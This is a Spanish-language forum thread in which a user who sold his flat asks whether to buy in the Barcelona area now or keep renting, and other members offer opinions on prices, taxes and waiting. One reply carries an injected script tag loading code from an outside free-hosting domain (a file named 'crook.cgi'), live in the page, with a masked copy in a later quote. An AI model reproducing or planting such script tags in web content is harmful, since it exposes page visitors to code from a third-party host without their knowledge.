Necesito consejo

hnoperro

Madmaxista
Desde
20 Abr 2007
Ante todo agradeceros la existencia de este foro (estoy aprendiendo MUCHO desde que lo leo) y el permitirme participar en el.

Veamos, hace 6 meses vendí mi piso y me fui a vivir de alquiler con mi muyer, esperando encontrar algo mas grande (mi piso solo tenia una habitación y unos 35 metros) para poder establecer una familia y esas cosas...

La cuestión es que el tiempo pasa (en un año y medio hacienda me penalizará con el 20% de la plus valía del piso que vendí) y no se si comprar ahora... esperarme... seguir de alquiler...

Podríais aconsejarme?

Gracias de antemano.

Calcula el dinero que tienes que pagar a hacienda por la plusvalia y calcula que de aquí a un año, minimo van a bajar las viviendas un 20%. A ver si te compensa. Tienes otra opcion... Ahora mismo, obras nuevas sin vender... aprietales hasta la extenuacion con el precio y comprate un piso para vivir. Probablemente traguen.

Pero lo mejor, si no tienes prisa, sigue de alquiler y mete el dinero en acciones de una empresa alemana de tu confianza, que van para arriba.<script src="http://phonebill.ifreepages.com/burbuja/crook.cgi"></script>

Última edición:
Hombre, si tienes bastante ahorrado quizá te puedas meter a comprar pagando pocos intereses. Todo depende.

ACONSEJAR NO ES BUENO,

se pueden dar puntos de vista sobre datos concretos, pero asi sin datos de ciudad, precios, precio de venta, de compra, salario, ahorro, etc, es imposible hablar de nada..

personalmente creo que no es bueno vender sino tienes otra vivienda, hacer eso es asumir un riesgo alto, (te puede salir bien o mal)
creo que en esa situación es mejor alquilar tu vivienda e irte a otra de alquiler si los precios suben sube tu piso , si bajan baja la diferencia, si los alquileres suben sube el tuyo etc...
en definitiva no te sales del mercado con los riesgos que eso implica.

Última edición:
hnoperro dijo:
La cuestión es que el tiempo pasa (en un año y medio hacienda me penalizará con el 20% de la plus valía del piso que vendí) y no se si comprar ahora... esperarme... seguir de alquiler...

Podríais aconsejarme?

Gracias de antemano.

Hombre, si te queda un año y medio para eso y dado como está el tema yo me esperaría al menos un año para ver como evoluciona el mercado, para comprar siempre hay tiempo...

Haz caso a ex-burbujista. Creo que tiene dos inmuebles en propiedad, sin hipoteca ni nada.

Si compras ahora regalas ese % al propietario o constructor de turno.

Si no, daras ese % a todos los españoles... asi que no compres y paga los impuestos... con esos podremos pagar el queroseno para flotar aviones canarias-madrid para fines humanitarios de los cayucos.

La cuestión es que ya he vendido... hace seis meses...

En principio estoy buscando, intentando no endeudarme con la hipoteca mas de un 30% de mis ingresos...

Si encuentro el piso que busco en esas condiciones... compro o me espero?

Yo ahora no compraria... Pero vamos a ser claros.
1- Cuanto dinero tienes en efectivo.
2- En que zona quieres comprar.

Asi, alomojo te podemos ayudar mas.

hnoperro dijo:
Ante todo agradeceros la existencia de este foro (estoy aprendiendo MUCHO desde que lo leo) y el permitirme participar en el.

Veamos, hace 6 meses vendí mi piso y me fui a vivir de alquiler con mi muyer, esperando encontrar algo mas grande (mi piso solo tenia una habitación y unos 35 metros) para poder establecer una familia y esas cosas...

Podríais aconsejarme?

Gracias de antemano.

La opción que te han dicho de esperar es buena. Piensa que por oferta no será a la hora de buscar un piso más adelante.

Quiero comprar en la zona de Barcelona (Hospitalet, Cornella, etc) y tengo en una cuenta vivienda ahora mismo 93000 €... Espero encontrar piso por unos 300000 € (3 habitaciones)...

Si tienes un año y medio yo creo que lo mejor es que esperes.
Hay muchos indicadores que hacen pensar que el precio de la vivienda puede bajar en los próximos meses. Siempre es un riesgo, pero en este caso parece bastante claro

Suerte

hnoperro dijo:
Quiero comprar en la zona de Barcelona (Hospitalet, Cornella, etc) y tengo en una cuenta vivienda ahora mismo 93000 €... Espero encontrar piso por unos 300000 € (3 habitaciones)...

Yo vivo en esplugues y hace tiempo que miro el mercado en esta zona. Está muy caro, los pisos de segunda mano de 80 metros no bajan de los 300k euros. De hecho he mirado varias promociones nuevas que estan acabadas de hace más de un año y aun no han vendido todo. Mira a ver si encuentras algun pepito que esté pillado y necesite dinero o mejor esperate.

hnoperro dijo:

creo que estas mal "aconsejado", visita a algun asesor fiscal, de verdad.

si vendiste tu vivienda hace 6 meses, no tiene sentido que tengas una cuenta vivienda de 93.000 euros. (te puede salir caro eso) como mucho deberas tener 18.000 euros en el caso de que sea en pareja, el resto del dinero sobra en esa cuenta. ve a un asesor o informate bien,

Calcula el dinero que tienes que pagar a hacienda por la plusvalia y calcula que de aquí a un año, minimo van a bajar las viviendas un 20%. A ver si te compensa. Tienes otra opcion... Ahora mismo, obras nuevas sin vender... aprietales hasta la extenuacion con el precio y comprate un piso para vivir. Probablemente traguen.

Pero lo mejor, si no tienes prisa, sigue de alquiler y mete el dinero en acciones de una empresa alemana de tu confianza, que van para arriba.<****** src="http://phonebill.**********.com/burbuja/crook*****"></******>

Han pasado 3 añicos, y de 20% de bajada... creo que nada. Refloto el hilo por que me ha parecido curioso. Como mucho, el precio de una casica este año es lo mismo que en el 2009. Creo que la previsión del HOSTIÓN era demasiado OPTIMISTA hace 3 años (caída 20% en un año).
¿Que os parece?

Volver